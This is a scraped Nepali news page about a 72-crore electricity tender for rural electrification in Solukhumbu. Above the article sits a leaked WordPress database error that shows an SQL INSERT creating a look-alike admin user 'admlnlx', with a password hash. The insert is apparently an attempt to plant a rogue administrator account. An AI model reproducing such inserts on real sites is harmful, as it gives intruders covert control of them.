WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgPDrztw3JCAu5E8MsA8KF0E446UXc0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 23:28:51', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । नेपाल विधुत प्राधिकरणले सोलुखुम्बु जिल्लामा ग्रामीण विधुतीकरणका लागी टेन्डर आव्हान गरेको छ ।
संघीय संसद प्रतिनिधिसभाका सदस्य हेमकुमार राईको पहलमा उज्यालो सोलुखुम्बु अभियान अन्तर्गत चालु आर्थिक बर्षका लागि बिनियोजित रकम मध्येबाट ७२ करोडको ठेक्का आव्हान भएको सांसद राईको सचिवालयले जनाएको छ । जिल्लामा ग्रामीण विधुतीकरणका लागि झण्डै ३ अर्बको स्टिमेट सर्बे सम्पन्न भइ सकेको सांसद राईले जानकारी दिए ।
पहिलो चरणमा आव्हान भएको ७२ करोडको टेन्डरबाट जिल्लाको महाकुलुङ गाउँपालिका बाहेकका अन्य ७ वटा स्थानीय तहमा पोल, तार र ट्रान्समिटर जडानको काम हुने बताईएको छ।
महाकुलुङ गाउँपालिकाको विधुतीकरणका लागि भने यस अघि नै १५ करोडको टेण्डर आव्हान भइ सकेको छ । उर्जा मन्त्रालय अन्तर्गतको सामुदायिक ग्रामीण विधुतीकरण संस्थाको ९० प्रतिशत र गाउँपालिकाको १० प्रतिशत लगानीमा १५ करोडको टेन्डर आव्हान भएको सांसद राईले जानकारी दिए ।
विधुतीकरणको उद्देश्यले जिल्लाका लागि बिनियोजित बजेटबाट छिटै अर्को चरणको टेण्डर आव्हान हुने समेत सांसद राईको भनाई छ।दोश्रो चरणमा देउसा र खरिखोलामा सव स्टेसन निर्माणसँगै अभियानलाई पूर्णता दिनेगरी काम हुने उनले बताए ।